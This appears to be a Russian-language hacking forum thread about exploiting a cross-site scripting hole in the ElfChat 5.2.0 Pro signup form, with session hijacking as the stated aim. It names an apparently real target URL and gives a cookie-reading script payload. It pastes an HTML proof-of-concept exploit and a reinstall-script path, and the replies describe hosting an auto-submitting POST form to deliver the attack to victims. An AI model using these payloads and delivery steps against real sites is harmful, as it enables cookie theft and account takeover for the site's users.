http://yourspier.com/temp/ElfChat/signup.php Уязвимость присутствует в скрипте для регистрации в поле "Name" Code: "><script>alert("cookie: "+document.cookie);</script> (работает в firefox) Задача перехват сессии, однако не совсем понятно каким образом можно сгенерировать вредоносную ссылку. Также по теме имеется exploit HTML: ElfChat 5.2.0 Pro Reinstall SCript EXploits =========================================== Author : indoushka Vondor : http://elfchat.ru/ Dork: 2011 Elfet - ElfChat 5.2.0 Pro ========================== <html> <head> <meta charset="utf-8"> <title>XSS Reflected - Jquery 1.4.2 </title> <script src="http://127.0.0.1/ElfChat//admin/js/jquery-1.4.2.min.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script>alert('xss reflected - jquery 1.4.2 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com');</script></option> </select> </p> </form> </body> </html> === and : /ElfChat/js/datepicker/js/jquery.js /ElfChat/js/min/jquery.js Reinstall SCript : http://127.0.0.1/ElfChat/install/index.php?act=settings
По видимому ты не понял в данном случае XSS реализуется не через GET, а через POST запрос. Тут нашел инфы http://www.enigmagroup.org/articles/view/Web Hacking/118-XSS-and-post-method Т.е. мы заливаем html exploit код которого указан выше меняем линки и даем link на html exploit ?
Как один из вариантов: Вам нужно сделать форму с ява скриптом и разместить ее на любом хостинге. Сделать так, чтобы при загрузке по событию onload автоматически нажмется сабмит. <form method = "POST" action:"target.com/youxss"> В параметрах Вы прописываете експлоит.